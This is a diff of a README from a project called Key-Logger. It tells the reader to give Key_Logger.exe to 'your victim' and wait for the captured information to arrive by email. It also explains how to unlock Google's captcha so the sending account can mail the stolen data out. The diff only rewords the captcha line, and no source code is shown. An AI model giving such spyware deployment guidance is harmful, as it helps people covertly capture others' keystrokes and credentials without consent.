FANIMA12/Key-Logger/README.md

 Then Give Key_Logger.exe To Your Victim
 And Wait , KeyLogger Will Give You The Information Via Email.

-You Should Go To This Address And Unlock Captcha To Give Application Access Without Need To Pass Captcha https://accounts.google.com/b/0/DisplayUnlockCaptcha
+You Should Go To This Address And Unlock Captcha To Give Application Access To Senedr Email Without Need To Pass Captcha https://accounts.google.com/b/0/DisplayUnlockCaptcha